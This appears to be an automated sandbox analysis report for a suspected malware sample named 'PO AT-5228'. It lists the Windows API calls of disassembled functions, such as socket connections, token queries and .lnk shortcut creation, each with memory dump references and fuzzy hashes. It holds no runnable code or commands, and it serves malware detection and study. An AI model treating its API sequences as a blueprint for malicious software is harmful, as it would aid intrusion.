• Instruction ID: f8ba9ee636c2ff8ce19f55ede64e959848ebc1e7ee9db728fa7f2283d3331594
• Opcode Fuzzy Hash: 3dc9a70af4a64db12e2593d93140864ef6f6a6e9c792029adb4efdb82ae8f6ed
• Instruction Fuzzy Hash: 9D21BE72204244BBEF159B2ADC89E7A7BE9DF45760B1080B9F8099A191EAA19841D6A0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B9BC90
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B9BCC2
                                                                                        • __itow.LIBCMT ref: 00B9BCDA
                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B9BD00
                                                                                        • __itow.LIBCMT ref: 00B9BD11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$__itow
                                                                                        • String ID:
                                                                                        • API String ID: 3379773720-0
                                                                                        • Opcode ID: 92232a7ee691b52e669e5716b2b25fed1d1cd465be63f4b15608398c195a7c2f
                                                                                        • Instruction ID: a356dd3b6e80e9e0d5b738b4e2000c9692e771f07c59fa333b236c7a475e5e55
                                                                                        • Opcode Fuzzy Hash: 92232a7ee691b52e669e5716b2b25fed1d1cd465be63f4b15608398c195a7c2f
                                                                                        • Instruction Fuzzy Hash: 1221C6356002187BDF20AA699D86FEE7BE9EF5A710F1014B4F905EB181DB708D4587E1
                                                                                        APIs
                                                                                          • Part of subcall function 00B650E6: _wcsncpy.LIBCMT ref: 00B650FA
                                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,00BA60C3), ref: 00BA6369
                                                                                        • GetLastError.KERNEL32(?,?,?,00BA60C3), ref: 00BA6374
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00BA60C3), ref: 00BA6388
                                                                                        • _wcsrchr.LIBCMT ref: 00BA63AA
                                                                                          • Part of subcall function 00BA6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00BA60C3), ref: 00BA63E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                        • String ID:
                                                                                        • API String ID: 3633006590-0
                                                                                        • Opcode ID: bce063501c6f771eabd574d13c5f5064427e7600b2316a3ca6d7c498e6fb5124
                                                                                        • Instruction ID: f48d91948d7c3d5d2a254cbd5b6b18a14a17918c53674b41815aeb5fbad42062
                                                                                        • Opcode Fuzzy Hash: bce063501c6f771eabd574d13c5f5064427e7600b2316a3ca6d7c498e6fb5124
                                                                                        • Instruction Fuzzy Hash: 832108715082158ADF15AB7C9C92FEE23ECEF17360F1844E9F115D70D0EFA0D9868A59
                                                                                        APIs
                                                                                          • Part of subcall function 00BBA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00BBA84E
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00BB8BD3
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00BB8BE2
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00BB8BFE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 3701255441-0
                                                                                        • Opcode ID: 75eb2651d94274730802e4f432ae34940836f4ad1837616ba44480c318bba1ee
                                                                                        • Instruction ID: 8591f2c39309c4bc91a74c46df8aa57385b95a4e9a4eeea829a9f84a0273ef45
                                                                                        • Opcode Fuzzy Hash: 75eb2651d94274730802e4f432ae34940836f4ad1837616ba44480c318bba1ee
                                                                                        • Instruction Fuzzy Hash: FC218E712002149FDB10AF68CD85BBE77EDEF48710F048499F916AB292CFB4EC018B51
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00BB8441
                                                                                        • GetForegroundWindow.USER32 ref: 00BB8458
                                                                                        • GetDC.USER32(00000000), ref: 00BB8494
                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00BB84A0
                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00BB84DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: e5f22667573da60daaccc183715e6b86180134be17db32c58a161ad0e45c9f0d
                                                                                        • Instruction ID: bede609e06c8f2f33eb142f8fcbccb37ebc2f6029d7c7e1170600c20b1051f43
                                                                                        • Opcode Fuzzy Hash: e5f22667573da60daaccc183715e6b86180134be17db32c58a161ad0e45c9f0d
                                                                                        • Instruction Fuzzy Hash: 90215475A00204AFD710DFA4D995AAEB7E9EF48301F0488B9E8599B352DFB4ED44CB50
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B7AFE3
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B7AFF2
                                                                                        • BeginPath.GDI32(?), ref: 00B7B009
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B7B033
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: d4b9810c03e5e22248d4fb154b40ae483fcbef5bdee8c01a0b1828bb37df6758
                                                                                        • Instruction ID: fb9cae7a493d8fbe21058950a27c020f9a2ccbc1932faeb9b79dfbf453c51e2b
                                                                                        • Opcode Fuzzy Hash: d4b9810c03e5e22248d4fb154b40ae483fcbef5bdee8c01a0b1828bb37df6758
                                                                                        • Instruction Fuzzy Hash: 4A217475810349EFDB21DF55EC84F9E7BA9F720355F18825AF8359A5A0D3704842CF91
                                                                                        APIs
                                                                                        • __calloc_crt.LIBCMT ref: 00B821A9
                                                                                        • CreateThread.KERNEL32(?,?,00B822DF,00000000,?,?), ref: 00B821ED
                                                                                        • GetLastError.KERNEL32 ref: 00B821F7
                                                                                        • _free.LIBCMT ref: 00B82200
                                                                                        • __dosmaperr.LIBCMT ref: 00B8220B
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                        • String ID:
                                                                                        • API String ID: 2664167353-0
                                                                                        • Opcode ID: 36d39cad8732b4024b8ecdb4b54b1f9b1e5831f325e7a14780515aea77e83f97
                                                                                        • Instruction ID: ffa1eab08c19c6cc3af6d2c6629a8950db71a4178be91a908845e7eb7eb829f3
                                                                                        • Opcode Fuzzy Hash: 36d39cad8732b4024b8ecdb4b54b1f9b1e5831f325e7a14780515aea77e83f97
                                                                                        • Instruction Fuzzy Hash: F611E132148346AFAB11BFA4DC41DAB3BD8EF04764B2004A9F9249B1B1EF71D811CBA0
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B9ABD7
                                                                                        • GetLastError.KERNEL32(?,00B9A69F,?,?,?), ref: 00B9ABE1
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00B9A69F,?,?,?), ref: 00B9ABF0
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00B9A69F,?,?,?), ref: 00B9ABF7
                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B9AC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: 3690b934ffa42b5eafa680fc81033f90df5e49f8a9e9a6652c051350c2c9f745
                                                                                        • Instruction ID: 72267dc5ce53a5865d12a83ae88e5a7e68466148a1458c1478bb6908e74da59b
                                                                                        • Opcode Fuzzy Hash: 3690b934ffa42b5eafa680fc81033f90df5e49f8a9e9a6652c051350c2c9f745
                                                                                        • Instruction Fuzzy Hash: 3F011971200244BFDF104FA9DC88DAB3FBDEF8A7557104469F945DB260DAB19C40CBA1
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32 ref: 00B99ADC
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 00B99AF7
                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00B99B05
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00B99B15
                                                                                        • CLSIDFromString.OLE32(?,?), ref: 00B99B21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        • Opcode ID: a4fb44b3247fd862e969ff9bdfeeb56655811aacc8798c419ecbf5379bc2c8bf
                                                                                        • Instruction ID: 8dd72cb62edee102be1bcc7b96cd39c718124765f07ab7de0346bb5bb16d3660
                                                                                        • Opcode Fuzzy Hash: a4fb44b3247fd862e969ff9bdfeeb56655811aacc8798c419ecbf5379bc2c8bf
                                                                                        • Instruction Fuzzy Hash: C8015676600218AFDB104F68EC84BAABBEDEF44752F148078F909DA210DBB4DD009BA0
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7A74
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BA7A82
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7A8A
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00BA7A94
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: 1333f1fd3a81fb7c3136c16ada1497b0df0143b1a3958bf7b0a87fd82b0b65bd
                                                                                        • Instruction ID: 8c5dc1023c9c5c3ae5326a1e5277b51da7913c90db49556b20941b5ce8651749
                                                                                        • Opcode Fuzzy Hash: 1333f1fd3a81fb7c3136c16ada1497b0df0143b1a3958bf7b0a87fd82b0b65bd
                                                                                        • Instruction Fuzzy Hash: 6F012935D4C619EBCF00AFE4DC99ADDBBB8FF0A711F004595E502B6250DF70965087A1
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B9AADA
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AAE4
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AAF3
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AAFA
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B9AB10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 5fe81c6534405de653732ff6e659ae4289126c734f150e45b1587b9e31dd68e0
                                                                                        • Instruction ID: 09832c5fa0f003b89a7078ad1628e7be06e7113eff1fdd50e03b8401f3f0c234
                                                                                        • Opcode Fuzzy Hash: 5fe81c6534405de653732ff6e659ae4289126c734f150e45b1587b9e31dd68e0
                                                                                        • Instruction Fuzzy Hash: E3F062712002486FEB111FA4ECC8F673BADFF45754F004179F941DB190CAA09D01CBA1
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B9AA79
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B9AA83
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B9AA92
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B9AA99
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B9AAAF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        • Opcode ID: 9c18b54a5cefc77413ba240c8ac4ffd2420bca00124c1cbd3ce9a594d94f982b
                                                                                        • Instruction ID: 88247364c940401b14c84186136af276dedab6770630b4c11027a1db2233ba1c
                                                                                        • Opcode Fuzzy Hash: 9c18b54a5cefc77413ba240c8ac4ffd2420bca00124c1cbd3ce9a594d94f982b
                                                                                        • Instruction Fuzzy Hash: 94F04971200244AFEB115FA5AC89EAB3BACFF4A754F040569F941DB1A0DAA09C41CAA2
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00B9EC94
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B9ECAB
                                                                                        • MessageBeep.USER32(00000000), ref: 00B9ECC3
                                                                                        • KillTimer.USER32(?,0000040A), ref: 00B9ECDF
                                                                                        • EndDialog.USER32(?,00000001), ref: 00B9ECF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        • Opcode ID: 6cd6f6c1da28284a54c357567e24345904749870e9be9c3b147e97bd679a0426
                                                                                        • Instruction ID: 17c3a21a70de0e3fab22d1dca6d88949a7909b53d3f9fd45432256514e48784f
                                                                                        • Opcode Fuzzy Hash: 6cd6f6c1da28284a54c357567e24345904749870e9be9c3b147e97bd679a0426
                                                                                        • Instruction Fuzzy Hash: C5018130500744ABEF349B50DE8EB967BF8FB10705F0009A9B593AA4E0DBF4EA44CB40
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 00B7B0BA
                                                                                        • StrokeAndFillPath.GDI32(?,?,00BDE680,00000000,?,?,?), ref: 00B7B0D6
                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B7B0E9
                                                                                        • DeleteObject.GDI32 ref: 00B7B0FC
                                                                                        • StrokePath.GDI32(?), ref: 00B7B117
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        • Opcode ID: a46a8cd5b5e39ab2faa6b64a71349578ddcf6f889accb24db62cdaafb910a439
                                                                                        • Instruction ID: f4c0873b3c7b0c6b877b9a51d720cb33d3720013d6969af3c2467acded9f2453
                                                                                        • Opcode Fuzzy Hash: a46a8cd5b5e39ab2faa6b64a71349578ddcf6f889accb24db62cdaafb910a439
                                                                                        • Instruction Fuzzy Hash: A2F01934020248EFCB219F65EC4DB5C3BA5E720362F0C8355F829998F1CB718956DF50
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00BAF2DA
                                                                                        • CoCreateInstance.OLE32(00BEDA7C,00000000,00000001,00BED8EC,?), ref: 00BAF2F2
                                                                                        • CoUninitialize.OLE32 ref: 00BAF555
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 948891078-24824748
                                                                                        • Opcode ID: 0d95a7b8efd29d9bff4e57cd416bcfe692d0f87c49e52e07a35a595b8547f688
                                                                                        • Instruction ID: 605b303dec41d86b9006ad68fbc39a8b933418fd5c83e8205e1d6ead7464b05a
                                                                                        • Opcode Fuzzy Hash: 0d95a7b8efd29d9bff4e57cd416bcfe692d0f87c49e52e07a35a595b8547f688
                                                                                        • Instruction Fuzzy Hash: 33A13B71104201AFD700EF64C881DAFB7ECEF98714F0489ADF59997192EB71EA49CB92
                                                                                        APIs
                                                                                          • Part of subcall function 00B6660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B653B1,?,?,00B661FF,?,00000000,00000001,00000000), ref: 00B6662F
                                                                                        • CoInitialize.OLE32(00000000), ref: 00BAE85D
                                                                                        • CoCreateInstance.OLE32(00BEDA7C,00000000,00000001,00BED8EC,?), ref: 00BAE876
                                                                                        • CoUninitialize.OLE32 ref: 00BAE893
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2126378814-24824748
                                                                                        • Opcode ID: 848c64eba5ead7db43511f0e6a0086565c3cb6bffc30cfd07ab5fe6653525714
